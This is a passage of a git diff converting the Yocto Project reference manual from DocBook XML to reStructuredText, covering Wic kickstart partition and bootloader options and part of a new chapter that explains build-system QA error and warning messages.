- <ulink url='http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html'>http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html</ulink>
- </literallayout>
- </para>
- </section>
-
- <section id='command-part-or-partition'>
- <title>Command: part or partition</title>
-
- <para>
- Either of these commands creates a partition on the system and uses
- the following syntax:
- <literallayout class='monospaced'>
- part [<replaceable>mntpoint</replaceable>]
- partition [<replaceable>mntpoint</replaceable>]
- </literallayout>
- If you do not provide <replaceable>mntpoint</replaceable>, Wic
- creates a partition but does not mount it.
- </para>
-
- <para>
- The <filename><replaceable>mntpoint</replaceable></filename> is
- where the partition is mounted and must be in one of the
- following forms:
- <itemizedlist>
- <listitem><para>
- <filename>/<replaceable>path</replaceable></filename>:
- For example, "/", "/usr", or "/home"
- </para></listitem>
- <listitem><para>
- <filename>swap</filename>:
- The created partition is used as swap space
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Specifying a <replaceable>mntpoint</replaceable> causes the
- partition to automatically be mounted.
- Wic achieves this by adding entries to the filesystem table (fstab)
- during image generation.
- In order for Wic to generate a valid fstab, you must also provide
- one of the <filename>--ondrive</filename>,
- <filename>--ondisk</filename>, or
- <filename>--use-uuid</filename> partition options as part of the
- command.
- <note>
- The mount program must understand the PARTUUID syntax you use
- with <filename>--use-uuid</filename> and non-root
- <replaceable>mountpoint</replaceable>, including swap.
- The busybox versions of these application are currently
- excluded.
- </note>
- Here is an example that uses "/" as the
- <replaceable>mountpoint</replaceable>.
- The command uses <filename>--ondisk</filename> to force the
- partition onto the
- <filename>sdb</filename> disk:
- <literallayout class='monospaced'>
- part / --source rootfs --ondisk sdb --fstype=ext3 --label platform --align 1024
- </literallayout>
- </para>
-
- <para>
- Here is a list that describes other supported options you can use
- with the <filename>part</filename> and
- <filename>partition</filename> commands:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>--size</filename>:</emphasis>
- The minimum partition size in MBytes.
- Specify an integer value such as 500.
- Do not append the number with "MB".
- You do not need this option if you use
- <filename>--source</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--fixed-size</filename>:</emphasis>
- The exact partition size in MBytes.
- You cannot specify with <filename>--size</filename>.
- An error occurs when assembling the disk image if the
- partition data is larger than
- <filename>--fixed-size</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--source</filename>:</emphasis>
- This option is a Wic-specific option that names the source
- of the data that populates the partition.
- The most common value for this option is "rootfs", but you
- can use any value that maps to a valid source plugin.
- For information on the source plugins, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#wic-using-the-wic-plugin-interface'>Using the Wic Plugins Interface</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>If you use <filename>--source rootfs</filename>, Wic
- creates a partition as large as needed and fills it with
- the contents of the root filesystem pointed to by the
- <filename>-r</filename> command-line option or the
- equivalent rootfs derived from the <filename>-e</filename>
- command-line option.
- The filesystem type used to create the partition is driven
- by the value of the <filename>--fstype</filename> option
- specified for the partition.
- See the entry on <filename>--fstype</filename> that follows
- for more information.</para>
-
- <para>If you use
- <filename>--source <replaceable>plugin-name</replaceable></filename>,
- Wic creates a partition as large as needed and fills it
- with the contents of the partition that is generated by the
- specified plugin name using the data pointed to by the
- <filename>-r</filename> command-line option or the
- equivalent rootfs derived from the <filename>-e</filename>
- command-line option.
- Exactly what those contents are and filesystem type used are
- dependent on the given plugin implementation.
- </para>
-
- <para>If you do not use the <filename>--source</filename>
- option, the <filename>wic</filename> command creates an
- empty partition.
- Consequently, you must use the <filename>--size</filename>
- option to specify the size of the empty partition.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--ondisk</filename> or <filename>--ondrive</filename>:</emphasis>
- Forces the partition to be created on a particular disk.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--fstype</filename>:</emphasis>
- Sets the file system type for the partition.
- Valid values are:
- <itemizedlist>
- <listitem><para>
- <filename>ext4</filename>
- </para></listitem>
- <listitem><para>
- <filename>ext3</filename>
- </para></listitem>
- <listitem><para>
- <filename>ext2</filename>
- </para></listitem>
- <listitem><para>
- <filename>btrfs</filename>
- </para></listitem>
- <listitem><para>
- <filename>squashfs</filename>
- </para></listitem>
- <listitem><para>
- <filename>swap</filename>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--fsoptions</filename>:</emphasis>
- Specifies a free-form string of options to be used when
- mounting the filesystem.
- This string is copied into the
- <filename>/etc/fstab</filename> file of the installed
- system and should be enclosed in quotes.
- If not specified, the default string is "defaults".
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--label label</filename>:</emphasis>
- Specifies the label to give to the filesystem to be made on
- the partition.
- If the given label is already in use by another filesystem,
- a new label is created for the partition.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--active</filename>:</emphasis>
- Marks the partition as active.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--align (in KBytes)</filename>:</emphasis>
- This option is a Wic-specific option that says to start
- partitions on boundaries given
- <replaceable>x</replaceable> KBytes.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--no-table</filename>:</emphasis>
- This option is a Wic-specific option.
- Using the option reserves space for the partition and
- causes it to become populated.
- However, the partition is not added to the partition table.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--exclude-path</filename>:</emphasis>
- This option is a Wic-specific option that excludes the given
- relative path from the resulting image.
- This option is only effective with the rootfs source
- plugin.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--extra-space</filename>:</emphasis>
- This option is a Wic-specific option that adds extra space
- after the space filled by the content of the partition.
- The final size can exceed the size specified by the
- <filename>--size</filename> option.
- The default value is 10 Mbytes.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--overhead-factor</filename>:</emphasis>
- This option is a Wic-specific option that multiplies the
- size of the partition by the option's value.
- You must supply a value greater than or equal to "1".
- The default value is "1.3".
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--part-name</filename>:</emphasis>
- This option is a Wic-specific option that specifies a name
- for GPT partitions.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--part-type</filename>:</emphasis>
- This option is a Wic-specific option that specifies the
- partition type globally unique identifier (GUID) for GPT
- partitions.
- You can find the list of partition type GUIDs at
- <ulink url='http://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs'></ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--use-uuid</filename>:</emphasis>
- This option is a Wic-specific option that causes Wic to
- generate a random GUID for the partition.
- The generated identifier is used in the bootloader
- configuration to specify the root partition.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--uuid</filename>:</emphasis>
- This option is a Wic-specific option that specifies the
- partition UUID.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--fsuuid</filename>:</emphasis>
- This option is a Wic-specific option that specifies the
- filesystem UUID.
- You can generate or modify
- <link linkend='var-WKS_FILE'><filename>WKS_FILE</filename></link>
- with this option if a preconfigured filesystem UUID is
- added to the kernel command line in the bootloader
- configuration before you run Wic.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--system-id</filename>:</emphasis>
- This option is a Wic-specific option that specifies the
- partition system ID, which is a one byte long, hexadecimal
- parameter with or without the 0x prefix.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--mkfs-extraopts</filename>:</emphasis>
- This option specifies additional options to pass to the
- <filename>mkfs</filename> utility.
- Some default options for certain filesystems do not take
- effect.
- See Wic's help on kickstart
- (i.e. <filename>wic help kickstart</filename>).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='command-bootloader'>
- <title>Command: bootloader</title>
-
- <para>
- This command specifies how the bootloader should be configured and
- supports the following options:
- <note>
- Bootloader functionality and boot partitions are implemented by
- the various <filename>--source</filename> plugins that
- implement bootloader functionality.
- The bootloader command essentially provides a means of
- modifying bootloader configuration.
- </note>
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>--timeout</filename>:</emphasis>
- Specifies the number of seconds before the bootloader times
- out and boots the default option.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--append</filename>:</emphasis>
- Specifies kernel parameters.
- These parameters will be added to the syslinux
- <filename>APPEND</filename> or <filename>grub</filename>
- kernel command line.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>--configfile</filename>:</emphasis>
- Specifies a user-defined configuration file for the
- bootloader.
- You can provide a full pathname for the file or a file that
- exists in the <filename>canned-wks</filename> folder.
- This option overrides all other bootloader options.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-manual-customization.xsl b/documentation/ref-manual/ref-manual-customization.xsl
deleted file mode 100644
index c58dd905b9..0000000000
--- a/documentation/ref-manual/ref-manual-customization.xsl
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
- <xsl:include href="../template/gloss-permalinks.xsl"/>
- <xsl:include href="../template/qa-code-permalinks.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'ref-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/ref-manual/ref-manual.rst b/documentation/ref-manual/ref-manual.rst
new file mode 100644
index 0000000000..033f4ba28c
--- /dev/null
+++ b/documentation/ref-manual/ref-manual.rst
@@ -0,0 +1,31 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==============================
+Yocto Project Reference Manual
+==============================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ ref-system-requirements
+ ref-terms
+ ref-release-process
+ migration
+ ref-structure
+ ref-classes
+ ref-tasks
+ ref-devtool-reference
+ ref-kickstart
+ ref-qa-checks
+ ref-images
+ ref-features
+ ref-variables
+ ref-varlocality
+ faq
+ resources
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/ref-manual/ref-manual.xml b/documentation/ref-manual/ref-manual.xml
deleted file mode 100755
index 1b82a41a7d..0000000000
--- a/documentation/ref-manual/ref-manual.xml
+++ /dev/null
@@ -1,252 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='ref-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/poky-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Reference Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
-
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>4.0+git</revnumber>
- <date>November 2010</date>
- <revremark>The initial document released with the Yocto Project 0.9 Release</revremark>
- </revision>
- <revision>
- <revnumber>1.0</revnumber>
- <date>April 2011</date>
- <revremark>Released with the Yocto Project 1.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.1</revnumber>
- <date>October 2011</date>
- <revremark>Released with the Yocto Project 1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.2</revnumber>
- <date>April 2012</date>
- <revremark>Released with the Yocto Project 1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.3</revnumber>
- <date>October 2012</date>
- <revremark>Released with the Yocto Project 1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>Released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Reference Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="ref-system-requirements.xml"/>
-
- <xi:include href="ref-terms.xml"/>
-
- <xi:include href="ref-release-process.xml"/>
-
- <xi:include href="migration.xml"/>
-
- <xi:include href="ref-structure.xml"/>
-
- <xi:include href="ref-classes.xml"/>
-
- <xi:include href="ref-tasks.xml"/>
-
- <xi:include href="ref-devtool-reference.xml"/>
-
- <xi:include href="ref-kickstart.xml"/>
-
- <xi:include href="ref-qa-checks.xml"/>
-
- <xi:include href="ref-images.xml"/>
-
- <xi:include href="ref-features.xml"/>
-
- <xi:include href="ref-variables.xml"/>
-
- <xi:include href="ref-varlocality.xml"/>
-
- <xi:include href="faq.xml"/>
-
- <xi:include href="resources.xml"/>
-
-<!-- <index id='index'>
- <title>Index</title>
- </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-qa-checks.rst b/documentation/ref-manual/ref-qa-checks.rst
new file mode 100644
index 0000000000..228b4fd538
--- /dev/null
+++ b/documentation/ref-manual/ref-qa-checks.rst
@@ -0,0 +1,568 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************
+QA Error and Warning Messages
+*****************************
+
+.. _qa-introduction:
+
+Introduction
+============
+
+When building a recipe, the OpenEmbedded build system performs various
+QA checks on the output to ensure that common issues are detected and
+reported. Sometimes when you create a new recipe to build new software,
+it will build with no problems. When this is not the case, or when you
+have QA issues building any software, it could take a little time to
+resolve them.
+
+While it is tempting to ignore a QA message or even to disable QA
+checks, it is best to try and resolve any reported QA issues. This
+chapter provides a list of the QA messages and brief explanations of the
+issues you could encounter so that you can properly resolve problems.
+
+The next section provides a list of all QA error and warning messages
+based on a default configuration. Each entry provides the message or
+error form along with an explanation.
+
+.. note::
+
+ - At the end of each message, the name of the associated QA test (as
+ listed in the ":ref:`insane.bbclass <ref-classes-insane>`"
+ section) appears within square brackets.
+
+ - As mentioned, this list of error and warning messages is for QA
+ checks only. The list does not cover all possible build errors or
+ warnings you could encounter.
+
+ - Because some QA checks are disabled by default, this list does not
+ include all possible QA check errors and warnings.
+
+.. _qa-errors-and-warnings:
+
+Errors and Warnings
+===================
+
+.. _qa-check-libexec:
+
+- ``<packagename>: <path> is using libexec please relocate to <libexecdir> [libexec]``
+
+ The specified package contains files in ``/usr/libexec`` when the
+ distro configuration uses a different path for ``<libexecdir>`` By
+ default, ``<libexecdir>`` is ``$prefix/libexec``. However, this
+ default can be changed (e.g. ``${libdir}``).
+
+  
+.. _qa-check-rpaths:
+
+- ``package <packagename> contains bad RPATH <rpath> in file <file> [rpaths]``
+
+ The specified binary produced by the recipe contains dynamic library
+ load paths (rpaths) that contain build system paths such as
+ :term:`TMPDIR`, which are incorrect for the target and
+ could potentially be a security issue. Check for bad ``-rpath``
+ options being passed to the linker in your
+ :ref:`ref-tasks-compile` log. Depending on the build
+ system used by the software being built, there might be a configure
+ option to disable rpath usage completely within the build of the
+ software.
+
+  
+.. _qa-check-useless-rpaths:
+
+- ``<packagename>: <file> contains probably-redundant RPATH <rpath> [useless-rpaths]``
+
+ The specified binary produced by the recipe contains dynamic library
+ load paths (rpaths) that on a standard system are searched by default
+ by the linker (e.g. ``/lib`` and ``/usr/lib``). While these paths
+ will not cause any breakage, they do waste space and are unnecessary.
+ Depending on the build system used by the software being built, there
+ might be a configure option to disable rpath usage completely within
+ the build of the software.
+
+  
+.. _qa-check-file-rdeps:
+
+- ``<packagename> requires <files>, but no providers in its RDEPENDS [file-rdeps]``
+
+ A file-level dependency has been identified from the specified
+ package on the specified files, but there is no explicit
+ corresponding entry in :term:`RDEPENDS`. If
+ particular files are required at runtime then ``RDEPENDS`` should be
+ declared in the recipe to ensure the packages providing them are
+ built.
+
+  
+.. _qa-check-build-deps:
+
+- ``<packagename1> rdepends on <packagename2>, but it isn't a build dependency? [build-deps]``
+
+ A runtime dependency exists between the two specified packages, but
+ there is nothing explicit within the recipe to enable the
+ OpenEmbedded build system to ensure that dependency is satisfied.
+ This condition is usually triggered by an
+ :term:`RDEPENDS` value being added at the packaging
+ stage rather than up front, which is usually automatic based on the
+ contents of the package. In most cases, you should change the recipe
+ to add an explicit ``RDEPENDS`` for the dependency.
+
+  
+.. _qa-check-dev-so:
+
+- ``non -dev/-dbg/nativesdk- package contains symlink .so: <packagename> path '<path>' [dev-so]``
+
+ Symlink ``.so`` files are for development only, and should therefore
+ go into the ``-dev`` package. This situation might occur if you add
+ ``*.so*`` rather than ``*.so.*`` to a non-dev package. Change
+ :term:`FILES` (and possibly
+ :term:`PACKAGES`) such that the specified ``.so``
+ file goes into an appropriate ``-dev`` package.
+
+  
+.. _qa-check-staticdev:
+
+- ``non -staticdev package contains static .a library: <packagename> path '<path>' [staticdev]``
+
+ Static ``.a`` library files should go into a ``-staticdev`` package.
+ Change :term:`FILES` (and possibly
+ :term:`PACKAGES`) such that the specified ``.a`` file
+ goes into an appropriate ``-staticdev`` package.
+
+  
+.. _qa-check-libdir:
+
+- ``<packagename>: found library in wrong location [libdir]``
+
+ The specified file may have been installed into an incorrect
+ (possibly hardcoded) installation path. For example, this test will
+ catch recipes that install ``/lib/bar.so`` when ``${base_libdir}`` is
+ "lib32". Another example is when recipes install
+ ``/usr/lib64/foo.so`` when ``${libdir}`` is "/usr/lib". False
+ positives occasionally exist. For these cases add "libdir" to
+ :term:`INSANE_SKIP` for the package.
+
+  
+.. _qa-check-debug-files:
+
+- ``non debug package contains .debug directory: <packagename> path <path> [debug-files]``
+
+ The specified package contains a ``.debug`` directory, which should
+ not appear in anything but the ``-dbg`` package. This situation might
+ occur if you add a path which contains a ``.debug`` directory and do
+ not explicitly add the ``.debug`` directory to the ``-dbg`` package.
+ If this is the case, add the ``.debug`` directory explicitly to
+ ``FILES_${PN}-dbg``. See :term:`FILES` for additional
+ information on ``FILES``.
+
+  
+.. _qa-check-arch:
+
+- ``Architecture did not match (<machine_arch> to <file_arch>) on <file> [arch]``
+
+ By default, the OpenEmbedded build system checks the Executable and
+ Linkable Format (ELF) type, bit size, and endianness of any binaries
+ to ensure they match the target architecture. This test fails if any
+ binaries do not match the type since there would be an
+ incompatibility. The test could indicate that the wrong compiler or
+ compiler options have been used. Sometimes software, like
+ bootloaders, might need to bypass this check. If the file you receive
+ the error for is firmware that is not intended to be executed within
+ the target operating system or is intended to run on a separate
+ processor within the device, you can add "arch" to
+ :term:`INSANE_SKIP` for the package. Another
+ option is to check the :ref:`ref-tasks-compile` log
+ and verify that the compiler options being used are correct.
+
+  
+
+- ``Bit size did not match (<machine_bits> to <file_bits>) <recipe> on <file> [arch]``
+
+ By default, the OpenEmbedded build system checks the Executable and
+ Linkable Format (ELF) type, bit size, and endianness of any binaries
+ to ensure they match the target architecture. This test fails if any
+ binaries do not match the type since there would be an
+ incompatibility. The test could indicate that the wrong compiler or
+ compiler options have been used. Sometimes software, like
+ bootloaders, might need to bypass this check. If the file you receive
+ the error for is firmware that is not intended to be executed within
+ the target operating system or is intended to run on a separate
+ processor within the device, you can add "arch" to
+ :term:`INSANE_SKIP` for the package. Another
+ option is to check the :ref:`ref-tasks-compile` log
+ and verify that the compiler options being used are correct.
+
+  
+
+- ``Endianness did not match (<machine_endianness> to <file_endianness>) on <file> [arch]``
+
+ By default, the OpenEmbedded build system checks the Executable and
+ Linkable Format (ELF) type, bit size, and endianness of any binaries
+ to ensure they match the target architecture. This test fails if any
+ binaries do not match the type since there would be an
+ incompatibility. The test could indicate that the wrong compiler or
+ compiler options have been used. Sometimes software, like
+ bootloaders, might need to bypass this check. If the file you receive
+ the error for is firmware that is not intended to be executed within
+ the target operating system or is intended to run on a separate
+ processor within the device, you can add "arch" to
+ :term:`INSANE_SKIP` for the package. Another
+ option is to check the :ref:`ref-tasks-compile` log
+ and verify that the compiler options being used are correct.
+
+  
+.. _qa-check-textrel:
+
+- ``ELF binary '<file>' has relocations in .text [textrel]``
+
+ The specified ELF binary contains relocations in its ``.text``
+ sections. This situation can result in a performance impact at
+ runtime.
+
+ Typically, the way to solve this performance issue is to add "-fPIC"
+ or "-fpic" to the compiler command-line options. For example, given
+ software that reads :term:`CFLAGS` when you build it,
+ you could add the following to your recipe:
+ ::
+
+ CFLAGS_append = " -fPIC "
+
+ For more information on text relocations at runtime, see
+ http://www.akkadia.org/drepper/textrelocs.html.
+
+  
+.. _qa-check-ldflags:
+
+- ``No GNU_HASH in the elf binary: '<file>' [ldflags]``
+
+ This indicates that binaries produced when building the recipe have
+ not been linked with the :term:`LDFLAGS` options
+ provided by the build system. Check to be sure that the ``LDFLAGS``
+ variable is being passed to the linker command. A common workaround
+ for this situation is to pass in ``LDFLAGS`` using
+ :term:`TARGET_CC_ARCH` within the recipe as
+ follows:
+ ::
+
+ TARGET_CC_ARCH += "${LDFLAGS}"
+
+  
+.. _qa-check-xorg-driver-abi:
+
+- ``Package <packagename> contains Xorg driver (<driver>) but no xorg-abi- dependencies [xorg-driver-abi]``
+
+ The specified package contains an Xorg driver, but does not have a
+ corresponding ABI package dependency. The xserver-xorg recipe
+ provides driver ABI names. All drivers should depend on the ABI
+ versions that they have been built against. Driver recipes that
+ include ``xorg-driver-input.inc`` or ``xorg-driver-video.inc`` will
+ automatically get these versions. Consequently, you should only need
+ to explicitly add dependencies to binary driver recipes.
+
+  
+.. _qa-check-infodir:
+
+- ``The /usr/share/info/dir file is not meant to be shipped in a particular package. [infodir]``
+
+ The ``/usr/share/info/dir`` should not be packaged. Add the following
+ line to your :ref:`ref-tasks-install` task or to your
+ ``do_install_append`` within the recipe as follows:
+ ::
+
+ rm ${D}${infodir}/dir
+  
+
+.. _qa-check-symlink-to-sysroot:
+
+- ``Symlink <path> in <packagename> points to TMPDIR [symlink-to-sysroot]``
+
+ The specified symlink points into :term:`TMPDIR` on the
+ host. Such symlinks will work on the host. However, they are clearly
+ invalid when running on the target. You should either correct the
+ symlink to use a relative path or remove the symlink.
+
+  
+.. _qa-check-la:
+
+- ``<file> failed sanity test (workdir) in path <path> [la]``
+
+ The specified ``.la`` file contains :term:`TMPDIR`
+ paths. Any ``.la`` file containing these paths is incorrect since
+ ``libtool`` adds the correct sysroot prefix when using the files
+ automatically itself.
+
+  
+.. _qa-check-pkgconfig:
+
+- ``<file> failed sanity test (tmpdir) in path <path> [pkgconfig]``
+
+ The specified ``.pc`` file contains
+ :term:`TMPDIR`\ ``/``\ :term:`WORKDIR`
+ paths. Any ``.pc`` file containing these paths is incorrect since
+ ``pkg-config`` itself adds the correct sysroot prefix when the files
+ are accessed.
+
+  
+.. _qa-check-debug-deps:
+
+- ``<packagename> rdepends on <debug_packagename> [debug-deps]``
+
+ A dependency exists between the specified non-dbg package (i.e. a
+ package whose name does not end in ``-dbg``) and a package that is a
+ ``dbg`` package. The ``dbg`` packages contain debug symbols and are
+ brought in using several different methods:
+
+ - Using the ``dbg-pkgs``
+ :term:`IMAGE_FEATURES` value.
+
+ - Using :term:`IMAGE_INSTALL`.
+
+ - As a dependency of another ``dbg`` package that was brought in
+ using one of the above methods.
+
+ The dependency might have been automatically added because the
+ ``dbg`` package erroneously contains files that it should not contain
+ (e.g. a non-symlink ``.so`` file) or it might have been added
+ manually (e.g. by adding to :term:`RDEPENDS`).
+
+  
+.. _qa-check-dev-deps:
+
+- ``<packagename> rdepends on <dev_packagename> [dev-deps]``
+
+ A dependency exists between the specified non-dev package (a package
+ whose name does not end in ``-dev``) and a package that is a ``dev``
+ package. The ``dev`` packages contain development headers and are
+ usually brought in using several different methods:
+
+ - Using the ``dev-pkgs``
+ :term:`IMAGE_FEATURES` value.
+
+ - Using :term:`IMAGE_INSTALL`.
+
+ - As a dependency of another ``dev`` package that was brought in
+ using one of the above methods.
+
+ The dependency might have been automatically added (because the
+ ``dev`` package erroneously contains files that it should not have
+ (e.g. a non-symlink ``.so`` file) or it might have been added
+ manually (e.g. by adding to :term:`RDEPENDS`).
+
+  
+.. _qa-check-dep-cmp:
+
+- ``<var>_<packagename> is invalid: <comparison> (<value>) only comparisons <, =, >, <=, and >= are allowed [dep-cmp]``
+
+ If you are adding a versioned dependency relationship to one of the
+ dependency variables (:term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`,
+ :term:`RPROVIDES`,
+ :term:`RREPLACES`, or
+ :term:`RCONFLICTS`), you must only use the named
+ comparison operators. Change the versioned dependency values you are
+ adding to match those listed in the message.
+
+  
+.. _qa-check-compile-host-path:
+
+- ``<recipename>: The compile log indicates that host include and/or library paths were used. Please check the log '<logfile>' for more information. [compile-host-path]``
+
+ The log for the :ref:`ref-tasks-compile` task
+ indicates that paths on the host were searched for files, which is
+ not appropriate when cross-compiling. Look for "is unsafe for
